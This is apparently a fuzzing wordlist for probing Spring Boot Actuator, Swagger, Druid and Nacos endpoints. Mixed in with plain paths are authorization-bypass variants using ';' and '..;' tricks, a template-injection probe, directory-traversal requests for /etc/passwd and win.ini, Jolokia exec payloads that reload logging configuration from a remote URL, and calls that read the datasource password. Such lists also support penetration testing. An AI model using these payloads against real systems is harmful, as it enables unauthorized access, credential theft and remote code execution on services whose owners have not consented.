
__swagger__
__swagger__/
_swagger_
_swagger_/
;/%20/swagger-ui.html
;/actuator
;/actuator/auditevents
;/actuator/beans
;/actuator/conditions
;/actuator/configprops
;/actuator/env
;/actuator/health
;/actuator/heapdump
;/actuator/httptrace
;/actuator/hystrix.stream
;/actuator/info
;/actuator/jolokia
;/actuator/logfile
;/actuator/loggers
;/actuator/mappings
;/actuator/metrics
;/actuator/scheduledtasks
;/actuator/swagger-ui.html
;/actuator/threaddump
;/actuator/trace
;/api-docs
;/api.html
;/api/doc
;/api/index.html
;/api/swagger
;/api/swagger-ui.html
;/api/swagger/ui
;/api/swaggerui
;/api/v2/api-docs
;/auditevents
;/autoconfig
;/beans
;/caches
;/cloudfoundryapplication
;/conditions
;/configprops
;/distv2/index.html
;/doc.html
;/docs
;/docs/
;/druid/index.html
;/druid/login.html
;/druid/websession.html
;/druid/websession.json
;/dubbo-provider/distv2/index.html
;/dump
;/entity/all
;/env
;/env/(name)
;/eureka
;/flyway
;/gateway/actuator
;/gateway/actuator/auditevents
;/gateway/actuator/beans
;/gateway/actuator/conditions
;/gateway/actuator/configprops
;/gateway/actuator/env
;/gateway/actuator/health
;/gateway/actuator/heapdump
;/gateway/actuator/httptrace
;/gateway/actuator/hystrix.stream
;/gateway/actuator/info
;/gateway/actuator/jolokia
;/gateway/actuator/logfile
;/gateway/actuator/loggers
;/gateway/actuator/mappings
;/gateway/actuator/metrics
;/gateway/actuator/scheduledtasks
;/gateway/actuator/swagger-ui.html
;/gateway/actuator/threaddump
;/gateway/actuator/trace
;/health
;/heapdump
;/heapdump.json
;/httptrace
;/hystrix
;/hystrix.stream
;/info
;/intergrationgraph
;/jolokia
;/jolokia/list
;/libs/swaggerui
;/liquibase
;/logfile
;/loggers
;/mappings
;/metrics
;/monitor
;/prometheus
;/refresh
;/scheduledtasks
;/sessions
;/spring-security-oauth-resource/swagger-ui.html
;/spring-security-rest/api/swagger-ui.html
;/static/swagger.json
;/sw/swagger-ui.html
;/swagger
;/swagger-dubbo/api-docs
;/swagger-resources/configuration/security
;/swagger-resources/configuration/ui
;/swagger-ui
;/swagger-ui.html
;/swagger-ui/html
;/swagger-ui/index.html
;/swagger/codes
;/swagger/index.html
;/swagger/static/index.html
;/swagger/swagger-ui.html
;/swagger/ui
;/Swagger/ui/index
;/swagger/v1/swagger.json
;/swagger/v2/swagger.json
;/system/druid/index.html
;/template/swagger-ui.html
;/threaddump
;/trace
;/user/swagger-ui.html
;/v1.1/swagger-ui.html
;/v1.2/swagger-ui.html
;/v1.3/swagger-ui.html
;/v1.4/swagger-ui.html
;/v1.5/swagger-ui.html
;/v1.6/swagger-ui.html
;/v1.7/swagger-ui.html
;/v1.8/swagger-ui.html
;/v1.9/swagger-ui.html
;/v1/api-docs
;/v2.0/swagger-ui.html
;/v2.1/swagger-ui.html
;/v2.2/swagger-ui.html
;/v2.3/swagger-ui.html
;/v2/api-docs
;/v2/swagger.json
;/v3/api-docs
;/webpage/system/druid/index.html
..;/%20/swagger-ui.html
..;/actuator
..;/actuator/auditevents
..;/actuator/beans
..;/actuator/conditions
..;/actuator/configprops
..;/actuator/env
..;/actuator/health
..;/actuator/heapdump
..;/actuator/httptrace
..;/actuator/hystrix.stream
..;/actuator/info
..;/actuator/jolokia
..;/actuator/logfile
..;/actuator/loggers
..;/actuator/mappings
..;/actuator/metrics
..;/actuator/scheduledtasks
..;/actuator/swagger-ui.html
..;/actuator/threaddump
..;/actuator/trace
..;/api-docs
..;/api.html
..;/api/doc
..;/api/index.html
..;/api/swagger
..;/api/swagger-ui.html
..;/api/swagger/ui
..;/api/swaggerui
..;/api/v1/api-docs
..;/api/v2/api-docs
..;/auditevents
..;/autoconfig
..;/beans
..;/caches
..;/cloudfoundryapplication
..;/conditions
..;/configprops
..;/distv2/index.html
..;/doc.html
..;/docs
..;/docs/
..;/druid/index.html
..;/druid/login.html
..;/druid/websession.html
..;/druid/websession.json
..;/dubbo-provider/distv2/index.html
..;/dump
..;/entity/all
..;/env
..;/env/(name)
..;/eureka
..;/flyway
..;/gateway/actuator
..;/gateway/actuator/auditevents
..;/gateway/actuator/beans
..;/gateway/actuator/conditions
..;/gateway/actuator/configprops
..;/gateway/actuator/env
..;/gateway/actuator/health
..;/gateway/actuator/heapdump
..;/gateway/actuator/httptrace
..;/gateway/actuator/hystrix.stream
..;/gateway/actuator/info
..;/gateway/actuator/jolokia
..;/gateway/actuator/logfile
..;/gateway/actuator/loggers
..;/gateway/actuator/mappings
..;/gateway/actuator/metrics
..;/gateway/actuator/scheduledtasks
..;/gateway/actuator/swagger-ui.html
..;/gateway/actuator/threaddump
..;/gateway/actuator/trace
..;/health
..;/heapdump
..;/heapdump.json
..;/httptrace
..;/hystrix
..;/hystrix.stream
..;/info
..;/intergrationgraph
..;/jolokia
..;/jolokia/list
..;/libs/swaggerui
..;/liquibase
..;/logfile
..;/loggers
..;/mappings
..;/metrics
..;/monitor
..;/prometheus
..;/refresh
..;/scheduledtasks
..;/sessions
..;/spring-security-oauth-resource/swagger-ui.html
..;/spring-security-rest/api/swagger-ui.html
..;/static/swagger.json
..;/sw/swagger-ui.html
..;/swagger
..;/swagger-dubbo/api-docs
..;/swagger-resources/configuration/security
..;/swagger-resources/configuration/ui
..;/swagger-ui
..;/swagger-ui.html
..;/swagger-ui/html
..;/swagger-ui/index.html
..;/swagger/codes
..;/swagger/index.html
..;/swagger/static/index.html
..;/swagger/swagger-ui.html
..;/swagger/ui
..;/Swagger/ui/index
..;/swagger/v1/swagger.json
..;/swagger/v2/swagger.json
..;/system/druid/index.html
..;/template/swagger-ui.html
..;/threaddump
..;/trace
..;/user/swagger-ui.html
..;/v1.1/swagger-ui.html
..;/v1.2/swagger-ui.html
..;/v1.3/swagger-ui.html
..;/v1.4/swagger-ui.html
..;/v1.5/swagger-ui.html
..;/v1.6/swagger-ui.html
..;/v1.7/swagger-ui.html
..;/v1.8/swagger-ui.html
..;/v1.9/swagger-ui.html
..;/v1/api-docs
..;/v2.0/swagger-ui.html
..;/v2.1/swagger-ui.html
..;/v2.2/swagger-ui.html
..;/v2.3/swagger-ui.html
..;/v2/api-docs
..;/v2/swagger.json
..;/v3/api-docs
..;/webpage/system/druid/index.html
..;api-docs
.well-known/openapi.json
.well-known/openapi.yaml
#/wallboard
%20/swagger-ui.html
2/explore/
acl/article?id=66
acm
actuator
actuator;/env;
actuator/;/auditevents
actuator/;/auditLog
actuator/;/beans
actuator/;/caches
actuator/;/conditions
actuator/;/configprops
actuator/;/configurationMetadata
actuator/;/dump
actuator/;/env
actuator/;/events
actuator/;/exportRegisteredServices
actuator/;/features
actuator/;/flyway
actuator/;/health
actuator/;/healthcheck
actuator/;/heapdump
actuator/;/httptrace
actuator/;/info
actuator/;/integrationgraph
actuator/;/jolokia
actuator/;/liquibase
actuator/;/logfile
actuator/;/loggers
actuator/;/loggingConfig
actuator/;/mappings
actuator/;/metrics
actuator/;/prometheus
actuator/;/refresh
actuator/;/registeredServices
actuator/;/releaseAttributes
actuator/;/resolveAttributes
actuator/;/scheduledtasks
actuator/;/sessions
actuator/;/shutdown
actuator/;/springWebflow
actuator/;/sso
actuator/;/ssoSessions
actuator/;/statistics
actuator/;/status
actuator/;/threaddump
actuator/;/trace
actuator/..;/..;/heapdump
actuator/..;/auditevents
actuator/..;/beans
actuator/..;/conditions
actuator/..;/env
actuator/..;/httptrace
actuator/..;/info
actuator/..;/jolokia
actuator/..;/metrics
actuator/..%2Fauditevents
actuator/..%2Fbeans
actuator/..%2Fconditions
actuator/..%2Fenv
actuator/..%2Fhttptrace
actuator/..%2Finfo
actuator/..%2Fjolokia
actuator/..%2Fmetrics
actuator/#/wallboard
actuator/%3B/auditevents
actuator/%3B/beans
actuator/%3B/conditions
actuator/%3B/env
actuator/%3B/httptrace
actuator/%3B/info
actuator/%3B/jolokia
actuator/%3B/metrics
actuator/%3B%2Fauditevents
actuator/%3B%2Fbeans
actuator/%3B%2Fconditions
actuator/%3B%2Fenv
actuator/%3B%2Fhttptrace
actuator/%3B%2Finfo
actuator/%3B%2Fjolokia
actuator/%3B%2Fmetrics
actuator/acm
actuator/admin/swagger-ui.html
actuator/api-docs
actuator/api.html
actuator/api/index.html
actuator/api/swagger-ui.html
actuator/api/v2/api-docs
actuator/api/v2/swagger.json
actuator/archaius
actuator/archaius/actuator/nacosdiscovery
actuator/article?id=${7*7}
actuator/article?id=66
actuator/auditevents
actuator/auditevents/actuator/intergrationgraph
actuator/auditing
actuator/auditlog
actuator/auditLog
actuator/autoconfig
actuator/beans
actuator/beans/actuator/jolokia
actuator/beans1
actuator/bindings
actuator/caches
actuator/caches/actuator/refresh
actuator/caches/cache
actuator/camel
actuator/channels
actuator/conditions
actuator/conditions/actuator/jolokia/list
actuator/conditions1
actuator/configprops
actuator/configprops/actuator/nacos
actuator/configurationmetadata
actuator/configurationMetadata
actuator/distv2/index.html
actuator/docs
actuator/documentations
actuator/druid/login.html
actuator/dubbo-provider/distv2/index.html
actuator/dump
actuator/env
actuator/env.json
actuator/env/actuator/liquibase
actuator/env/home
actuator/env/hostname
actuator/env/java.home
actuator/env/lang
actuator/env/language
actuator/env/path
actuator/env/pwd
actuator/env/spring.jmx.enabled
actuator/env/system
actuator/env/tz
actuator/events
actuator/exportregisteredservices
actuator/exportRegisteredServices
actuator/fallbackapplicationcontext
actuator/favicon.ico
actuator/features
actuator/features/actuator/peripheral/swagger-ui.html
actuator/flyway
actuator/gateway
actuator/gateway/globalfilters
actuator/gateway/refresh
actuator/gateway/routefilters
actuator/gateway/routes
actuator/gateway/routes/new_route
actuator/gatewayroutes/1
actuator/get
actuator/h2-console
actuator/health
actuator/health.json
actuator/health/
actuator/health/actuator/loggers
actuator/health/nacos
actuator/healthcheck
actuator/heapdump
actuator/heapdump.json
actuator/heapdump/actuator/loggers/nacos
actuator/httptrace
actuator/httptrace/actuator/mappings
actuator/hystrix.stream
actuator/hystrix.stream/*/actuator/swagger
actuator/influxdb
actuator/info
actuator/info/actuator/metrics
actuator/integrationgraph
actuator/intergrationgraph
actuator/jdbc
actuator/jmx
actuator/jolokia
actuator/jolokia/*/actuator/static/swagger.json
actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml
actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
actuator/jolokia/list
actuator/jolokia/search/*:test=test
actuator/jvm
actuator/jvm/heapdump
actuator/keyvault
actuator/liquibase
actuator/logfile
actuator/logfile/actuator/sw/swagger-ui.html
actuator/loggers
actuator/loggers/
actuator/loggers/actuator/metrics/nacos
actuator/loggingconfig
actuator/loggingConfig
actuator/mail
actuator/management
actuator/management/heapdump
actuator/mappings
actuator/mappings            
actuator/mappings/actuator/monitor/conditions
actuator/metrics
actuator/metrics            
actuator/metrics/
actuator/metrics/actuator/monitor/env
actuator/micrometer
actuator/monitor/auditevents
actuator/monitor/conditions
actuator/monitor/env
actuator/monitor/loggers
actuator/monitor/mappings
actuator/monitor/scheduledtasks
actuator/monitor/threaddump
actuator/nacos
actuator/nacos-config/actuator/swagger-resourcesce
actuator/nacos-discovery/actuator/swagger-ui
actuator/nacos/config
actuator/nacos/v1/cs/configs
actuator/nacos/v1/cs/configs?dataId=Misplaced
actuator/nacos/v1/ns/instance
actuator/nacos/v1/ns/instance?serviceName=springboot2-nacos-discovery
actuator/nacos/v1/service/list?pageSize=123&groupname=default_group&encoding=utf-8
actuator/nacos/v2/cs/configs
actuator/nacos/v2/cs/configs?dataId=Misplaced
actuator/nacos/v2/ns/instance
actuator/nacos/v2/ns/instance?serviceName=springboot2-nacos-discovery
actuator/nacos/v2/service/list?pageSize=123&groupname=default_group&encoding=utf-8
actuator/nacosconfig
actuator/peripheral/swagger-ui.html
actuator/peripheral/v2/api-docs
actuator/post-shutdown
actuator/prometheus
actuator/prometheus/actuator/swagger-dubbo/api-docs
actuator/prometheusenv/home
actuator/readiness
actuator/redis
actuator/redis/info
actuator/redis/keysSize
actuator/redis/memoryInfo
actuator/redisson
actuator/refresh
actuator/refresh/actuator/peripheral/v2/api-docs
actuator/registeredservices
actuator/registeredServices
actuator/releaseattributes
actuator/releaseAttributes
actuator/resolveattributes
actuator/resolveAttributes
actuator/restart
actuator/routes
actuator/scheduledtasks
actuator/scheduledtasks/actuator/monitor/mappings
actuator/sentinel
actuator/service-registry
actuator/service-registry/actuator/prometheus
actuator/sessions
actuator/sessions/
actuator/sessions/actuator/swagger-ui.html
actuator/shutdown
actuator/solr
actuator/spring-security-oauth-resource/swagger-ui.html
actuator/spring-security-oauth2-resource-server
actuator/spring-security-rest/api/swagger-ui.html
actuator/springwebflow
actuator/springWebflow
actuator/sso
actuator/ssosessions
actuator/ssoSessions
actuator/static/swagger.json
actuator/statistics
actuator/status
actuator/sw/swagger-ui.html
actuator/swagger
actuator/swagger-dubbo/api-docs
actuator/swagger-resourcesce
actuator/swagger-ui
actuator/swagger-ui.html
actuator/swagger-ui/index.html
actuator/swagger/codes
actuator/swagger/index.html
actuator/swagger/static/index.html
actuator/system
actuator/system/
actuator/system/env
actuator/system/mappings
actuator/system/showOsInfo
actuator/system/showProperties
actuator/tasks
actuator/template/swagger-ui.html
actuator/threaddump
actuator/threaddump/actuator/monitor/scheduledtasks
actuator/tra
actuator/trace
actuator/transactions
actuator/user/swagger-ui.html
actuator/versions
actuator/websocket
actuators
actuators.js
actuators/
actuators/dump
actuators/env
actuators/health
actuators/logfile
actuators/mappings
actuators/shutdown
actuators/trace
admin
admin/swagger-ui.html
api
api_docs
api-doc
api-doc/swagger.json
api-doc/swagger.yaml
api-doc/v2/swagger.json
api-docs
api-docs.json
api-docs/
api-docs/index.html
api-docs/swagger
api-docs/swagger-ui.html
api-docs/swagger-ui/index.html
api-docs/swagger.json
api-docs/swagger.yaml
api-docs/ui/
api-docs/v1/swagger.json
api-docs/v2/swagger.json
api-explorer/
api.html
api/__swagger__
api/__swagger__/
api/_swagger_
api/_swagger_/
api/..;;/v3/api-docs?group=H5接口
api/2/explore/
api/actuator
api/actuator/auditevents
api/actuator/auditLog
api/actuator/beans
api/actuator/caches
api/actuator/conditions
api/actuator/configprops
api/actuator/configurationMetadata
api/actuator/dump
api/actuator/env
api/actuator/env/home
api/actuator/env/hostname
api/actuator/env/lang
api/actuator/env/language
api/actuator/env/path
api/actuator/env/pwd
api/actuator/env/spring.jmx.enabled
api/actuator/env/tz
api/actuator/events
api/actuator/exportRegisteredServices
api/actuator/features
api/actuator/flyway
api/actuator/gateway/routes
api/actuator/health
api/actuator/healthcheck
api/actuator/heapdump
api/actuator/httptrace
api/actuator/info
api/actuator/integrationgraph
api/actuator/jolokia
api/actuator/liquibase
api/actuator/logfile
api/actuator/loggers
api/actuator/loggingConfig
api/actuator/mappings
api/actuator/metrics
api/actuator/prometheus
api/actuator/redis/info
api/actuator/redis/keysSize
api/actuator/redis/memoryInfo
api/actuator/refresh
api/actuator/registeredServices
api/actuator/releaseAttributes
api/actuator/resolveAttributes
api/actuator/scheduledtasks
api/actuator/sessions
api/actuator/shutdown
api/actuator/springWebflow
api/actuator/sso
api/actuator/ssoSessions
api/actuator/statistics
api/actuator/status
api/actuator/threaddump
api/actuator/trace
api/api-docs
api/api-docs/swagger.json
api/api-docs/swagger.yaml
api/apidocs
api/apidocs/swagger.json
api/apidocs/swagger.yaml
api/doc
api/doc.json
api/docs/
api/docs/index.html
api/docs/swagger-ui.html
api/documentation
api/explorer/
api/explorer/index.html
api/index.html
api/kcdb/swagger-ui/index.html
api/openapi.json
api/openapi.yaml
api/package_search/v4/documentation
api/spec/swagger.json
api/spec/swagger.yaml
api/static/swagger-ui
api/swagger
api/swagger_doc.json
api/swagger-api
api/swagger-resources
api/swagger-resources/restservices/v2/api-docs
api/swagger-ui
api/swagger-ui-bundle.js
api/swagger-ui.html
api/swagger-ui.json
api/swagger-ui/
api/swagger-ui/api-docs
api/swagger-ui/index.html
api/swagger-ui/swagger.json
api/swagger-ui/swagger.yaml
api/swagger.json
api/swagger.yaml
api/swagger.yml
api/swagger/
api/swagger/doc.json
api/swagger/docs/v1
api/swagger/index
api/swagger/index.html
api/swagger/resources
api/swagger/static/index.html
api/swagger/swagger
api/swagger/swagger-ui.html
api/swagger/ui
api/swagger/ui/index
api/swagger/v1/swagger.json
api/swaggerapi
api/swaggerui
api/swaggerui/swagger.json
api/swaggerui/swagger.yaml
api/v1
api/v1.0/swagger.json
api/v1.0/swagger.yaml
api/v1/
api/v1/api-docs
api/v1/api-docs.json
api/v1/apidocs
api/v1/apidocs/index.html
api/v1/docs
api/v1/docs/swagger.json
api/v1/documentation
api/v1/login
api/v1/swagger
api/v1/swagger-resources
api/v1/swagger-ui
api/v1/swagger-ui.html
api/v1/swagger-ui.json
api/v1/swagger-ui.yaml
api/v1/swagger-ui/
api/v1/swagger-ui/swagger.json
api/v1/swagger-ui/swagger.yaml
api/v1/swagger.json
api/v1/swagger.yaml
api/v1/swagger/
api/v2
api/v2.0/swagger.json
api/v2.0/swagger.yaml
api/v2/api-docs
api/v2/apidocs
api/v2/docs
api/v2/docs/
api/v2/documentation/api
api/v2/login
api/v2/swagger
api/v2/swagger-resources
api/v2/swagger-ui
api/v2/swagger-ui.html
api/v2/swagger-ui.json
api/v2/swagger-ui/
api/v2/swagger.json
api/v2/swagger.yaml
api/v2/swagger/
api/v3
api/v3/docs
api/v3/documentation
api/v3/swagger-ui.html
api/v3/swagger.json
api/v3/swagger.yaml
apidoc
apidoc/swagger
apidoc/v1/swagger.json
apidocs
apidocs/
apidocs/index.html
apidocs/swagger-ui.html
apidocs/swagger.json
apidocs/swagger.yaml
apis
apis/
apis/docs
apis/swagger
apis/v1/swagger.json
apispec_1.json
apispec/swagger.json
appenv
appenv/
application
artemis
artemis/
article?id=${7*7}
article?id=66
auditevents
auditevents/
auditLog
auditLog/
autoconfig
autoconfig/
backoffice/v1/ui
beans
beans/
beans1
build/reference/web-api/explore
caches
channels
clients
clients/actuator/system/showOsInfo
clients/all/actuator/tra
clients/saveOrUpdate/actuator/trace
cloudfoundryapplication
conditions
conditions1
configprops
configurationMetadata
core/latest/swagger-ui/index.html
corp
corp/
csp/gateway/slc/api/swagger-ui.html
distv2/index.html
doc
doc.html
doc.json
doc/
doc/swagger
docs
docs/
docs/api/
docs/api/swagger.json
docs/api/swagger.yaml
docs/index.html
docs/swagger
docs/swagger-ui.html
docs/swagger.json
docs/swagger.yaml
docs/v1
docs/v1/swagger.json
docs/v2/swagger.json
docu
docu/
documentation
documentation/swagger
documentation/swagger.json
documentation/swagger.yaml
documentation/version
druid/*/actuator/swagger/codes
druid/api.html
druid/basic.json
druid/datasource.html
druid/index.html
druid/login.html
druid/spring.html
druid/sql.html
druid/wall.html
druid/webapp.html
druid/websession.html
druid/websession.json
druid/weburi.html
dubbo-provider/distv2/index.html
dump
enabled
entity/all
env
env/
env/(name)
env/{name}
env/home
env/hostname
env/java.home
env/lang
env/language
env/nacos
env/path
env/pwd
env/spring
env/spring.jmx.enabled
env/tz
error/..;/v2/api-docs
error/actuator/monitor/threaddump
eureka
eureka/
eureka/*/actuator/service-registry
events
events/
explorer/
explorer/index.html
explorer/swagger.json
exportRegisteredServices
features
file
file/
file/swagger-resources
file/swagger-resources/configuration/security
file/swagger-resources/configuration/ui
file/v2/api-docs
flyway
gateway
gateway/
gateway/actuator
gateway/actuator/auditevents
gateway/actuator/beans
gateway/actuator/conditions
gateway/actuator/configprops
gateway/actuator/env
gateway/actuator/health
gateway/actuator/heapdump
gateway/actuator/heapdump.json
gateway/actuator/httptrace
gateway/actuator/hystrix.stream
gateway/actuator/info
gateway/actuator/jolokia
gateway/actuator/logfile
gateway/actuator/loggers
gateway/actuator/mappings
gateway/actuator/metrics
gateway/actuator/scheduledtasks
gateway/actuator/swagger-ui.html
gateway/actuator/threaddump
gateway/actuator/trace
gateway/call/
gateway/call/signDataSynCall
gateway/refresh
gateway/routes
gateway/routes/new_route
gen-swagger-docs.sh
get
get?serviceName=springboot2-nacos-discovery
graphql
graphql/
h2-console
h2-console/
health
health/
healthcheck
heapdump
heapdump.json
help
help/
home
home/
hostname
httptrace
httptrace/
hystrix
hystrix.stream
index.html
info
info/
integrationgraph
intergrationgraph
internal/docs
jhimetrics
jolokia
jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.password
jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.url
jolokia/list
kcdb/swagger-ui/index.html
lang
language
lastn/actuator/sessions
libs/swaggerui
liquibase
list
log/view?filename=/etc/passwd&base=../../../../../../../../../../
log/view?filename=/windows/win.ini&base=../../../../../../../../../../
logfile
loggers
loggingConfig
login/admin/swagger-ui.html
manage
manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
management
management/auditevents
management/beans
management/caches
management/conditions
management/configprops
management/enabled
management/env
management/flyway
management/health
management/heapdump
management/httptrace
management/info
management/integrationgraph
management/jhimetrics
management/jolokia
management/liquibase
management/logfile
management/loggers
management/mappings
management/metrics
management/prometheus
management/quartz
management/scheduledtasks
management/sessions
management/shutdown
management/startup
management/threaddump
mappings
metrics
metrics/
metrics/{name}
metrics/mem
metrics/nacos
metrics/swagger-resources
monitor
monitor/auditevents
monitor/beans
monitor/conditions
monitor/configprops
monitor/env
monitor/health
monitor/heapdump
monitor/httptrace
monitor/hystrix.stream
monitor/info
monitor/jolokia
monitor/loggers
monitor/mappings
monitor/metrics
monitor/scheduledtasks
monitor/threaddump
nacos
nacos/actuator
nacos/actuator/;/auditevents
nacos/actuator/;/auditLog
nacos/actuator/;/beans
nacos/actuator/;/caches
nacos/actuator/;/conditions
nacos/actuator/;/configprops
nacos/actuator/;/configurationMetadata
nacos/actuator/;/dump
nacos/actuator/;/env
nacos/actuator/;/events
nacos/actuator/;/exportRegisteredServices
nacos/actuator/;/features
nacos/actuator/;/flyway
nacos/actuator/;/health
nacos/actuator/;/healthcheck
nacos/actuator/;/heapdump
nacos/actuator/;/httptrace
nacos/actuator/;/info
nacos/actuator/;/integrationgraph
nacos/actuator/;/jolokia
nacos/actuator/;/liquibase
nacos/actuator/;/logfile
nacos/actuator/;/loggers
nacos/actuator/;/loggingConfig
nacos/actuator/;/mappings
nacos/actuator/;/metrics
nacos/actuator/;/prometheus
nacos/actuator/;/refresh
nacos/actuator/;/registeredServices
nacos/actuator/;/releaseAttributes
nacos/actuator/;/resolveAttributes
nacos/actuator/;/scheduledtasks
nacos/actuator/;/sessions
nacos/actuator/;/shutdown
nacos/actuator/;/springWebflow
nacos/actuator/;/sso
nacos/actuator/;/ssoSessions
nacos/actuator/;/statistics
nacos/actuator/;/status
nacos/actuator/;/threaddump
nacos/actuator/;/trace
nacos/actuator/..;/..;/heapdump
nacos/actuator/..;/auditevents
nacos/actuator/..;/beans
nacos/actuator/..;/conditions
nacos/actuator/..;/env
nacos/actuator/..;/httptrace
nacos/actuator/..;/info
nacos/actuator/..;/jolokia
nacos/actuator/..;/metrics
nacos/actuator/..%2Fauditevents
nacos/actuator/..%2Fbeans
nacos/actuator/..%2Fconditions
nacos/actuator/..%2Fenv
nacos/actuator/..%2Fhttptrace
nacos/actuator/..%2Finfo
nacos/actuator/..%2Fjolokia
nacos/actuator/..%2Fmetrics
nacos/actuator/#/wallboard
nacos/actuator/%3B/auditevents
nacos/actuator/%3B/beans
nacos/actuator/%3B/conditions
nacos/actuator/%3B/env
nacos/actuator/%3B/httptrace
nacos/actuator/%3B/info
nacos/actuator/%3B/jolokia
nacos/actuator/%3B/metrics
nacos/actuator/%3B%2Fauditevents
nacos/actuator/%3B%2Fbeans
nacos/actuator/%3B%2Fconditions
nacos/actuator/%3B%2Fenv
nacos/actuator/%3B%2Fhttptrace
nacos/actuator/%3B%2Finfo
nacos/actuator/%3B%2Fjolokia
nacos/actuator/%3B%2Fmetrics
nacos/actuator/acm
nacos/actuator/admin/swagger-ui.html
nacos/actuator/api-docs
nacos/actuator/api.html
nacos/actuator/api/index.html
nacos/actuator/api/swagger-ui.html
nacos/actuator/api/v2/api-docs
nacos/actuator/api/v2/swagger.json
nacos/actuator/archaius
nacos/actuator/archaius/actuator/nacosdiscovery
nacos/actuator/article?id=${7*7}
nacos/actuator/article?id=66
nacos/actuator/auditevents
nacos/actuator/auditevents/actuator/intergrationgraph
nacos/actuator/auditing
nacos/actuator/auditlog
nacos/actuator/auditLog
nacos/actuator/autoconfig
nacos/actuator/beans
nacos/actuator/beans/actuator/jolokia
nacos/actuator/beans1
nacos/actuator/bindings
nacos/actuator/caches
nacos/actuator/caches/actuator/refresh
nacos/actuator/caches/cache
nacos/actuator/camel
nacos/actuator/channels
nacos/actuator/conditions
nacos/actuator/conditions/actuator/jolokia/list
nacos/actuator/conditions1
nacos/actuator/configprops
nacos/actuator/configprops/actuator/nacos
nacos/actuator/configurationmetadata
nacos/actuator/configurationMetadata
nacos/actuator/distv2/index.html
nacos/actuator/docs
nacos/actuator/documentations
nacos/actuator/druid/login.html
nacos/actuator/dubbo-provider/distv2/index.html
nacos/actuator/dump
nacos/actuator/env
nacos/actuator/env.json
nacos/actuator/env/actuator/liquibase
nacos/actuator/env/home
nacos/actuator/env/hostname
nacos/actuator/env/java.home
nacos/actuator/env/lang
nacos/actuator/env/language
nacos/actuator/env/path
nacos/actuator/env/pwd
nacos/actuator/env/spring.jmx.enabled
nacos/actuator/env/system
nacos/actuator/env/tz
nacos/actuator/events
nacos/actuator/exportregisteredservices
nacos/actuator/exportRegisteredServices
nacos/actuator/fallbackapplicationcontext
nacos/actuator/favicon.ico
nacos/actuator/features
nacos/actuator/features/actuator/peripheral/swagger-ui.html
nacos/actuator/flyway
nacos/actuator/gateway
nacos/actuator/gateway/globalfilters
nacos/actuator/gateway/refresh
nacos/actuator/gateway/routefilters
nacos/actuator/gateway/routes
nacos/actuator/gateway/routes/new_route
nacos/actuator/gatewayroutes/1
nacos/actuator/get
nacos/actuator/h2-console
nacos/actuator/health
nacos/actuator/health.json
nacos/actuator/health/
nacos/actuator/health/actuator/loggers
nacos/actuator/health/nacos
nacos/actuator/healthcheck
nacos/actuator/heapdump
nacos/actuator/heapdump.json
nacos/actuator/heapdump/actuator/loggers/nacos
nacos/actuator/httptrace
nacos/actuator/httptrace/actuator/mappings
nacos/actuator/hystrix.stream
nacos/actuator/hystrix.stream/*/actuator/swagger
nacos/actuator/influxdb
nacos/actuator/info
nacos/actuator/info/actuator/metrics
nacos/actuator/integrationgraph
nacos/actuator/intergrationgraph
nacos/actuator/jdbc
nacos/actuator/jmx
nacos/actuator/jolokia
nacos/actuator/jolokia/*/actuator/static/swagger.json
nacos/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml
nacos/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
nacos/actuator/jolokia/list
nacos/actuator/jolokia/search/*:test=test
nacos/actuator/jvm
nacos/actuator/jvm/heapdump
nacos/actuator/keyvault
nacos/actuator/liquibase
nacos/actuator/logfile
nacos/actuator/logfile/actuator/sw/swagger-ui.html
nacos/actuator/loggers
nacos/actuator/loggers/
nacos/actuator/loggers/actuator/metrics/nacos
nacos/actuator/loggingconfig
nacos/actuator/loggingConfig
nacos/actuator/mail
nacos/actuator/management
nacos/actuator/management/heapdump
nacos/actuator/mappings
nacos/actuator/mappings            
nacos/actuator/mappings/actuator/monitor/conditions
nacos/actuator/metrics
nacos/actuator/metrics            
nacos/actuator/metrics/
nacos/actuator/metrics/actuator/monitor/env
nacos/actuator/micrometer
nacos/actuator/monitor/auditevents
nacos/actuator/monitor/conditions
nacos/actuator/monitor/env
nacos/actuator/monitor/loggers
nacos/actuator/monitor/mappings
nacos/actuator/monitor/scheduledtasks
nacos/actuator/monitor/threaddump
nacos/actuator/nacos
nacos/actuator/nacos-config/actuator/swagger-resourcesce
nacos/actuator/nacos-discovery/actuator/swagger-ui
nacos/actuator/nacos/config
nacos/actuator/nacos/v1/cs/configs
nacos/actuator/nacos/v1/cs/configs?dataId=Misplaced
nacos/actuator/nacos/v1/ns/instance
nacos/actuator/nacos/v1/ns/instance?serviceName=springboot2-nacos-discovery
nacos/actuator/nacos/v1/service/list?pageSize=123&groupname=default_group&encoding=utf-8
nacos/actuator/nacos/v2/cs/configs
nacos/actuator/nacos/v2/cs/configs?dataId=Misplaced
nacos/actuator/nacos/v2/ns/instance
nacos/actuator/nacos/v2/ns/instance?serviceName=springboot2-nacos-discovery
nacos/actuator/nacos/v2/service/list?pageSize=123&groupname=default_group&encoding=utf-8
nacos/actuator/nacosconfig
nacos/actuator/peripheral/swagger-ui.html
nacos/actuator/peripheral/v2/api-docs
nacos/actuator/post-shutdown
nacos/actuator/prometheus
nacos/actuator/prometheus/actuator/swagger-dubbo/api-docs
nacos/actuator/prometheusenv/home
nacos/actuator/readiness
nacos/actuator/redis
nacos/actuator/redis/info
nacos/actuator/redis/keysSize
nacos/actuator/redis/memoryInfo
nacos/actuator/redisson
nacos/actuator/refresh
nacos/actuator/refresh/actuator/peripheral/v2/api-docs
nacos/actuator/registeredservices
nacos/actuator/registeredServices
nacos/actuator/releaseattributes
nacos/actuator/releaseAttributes
nacos/actuator/resolveattributes
nacos/actuator/resolveAttributes
nacos/actuator/restart
nacos/actuator/routes
nacos/actuator/scheduledtasks
nacos/actuator/scheduledtasks/actuator/monitor/mappings
nacos/actuator/sentinel
nacos/actuator/service-registry
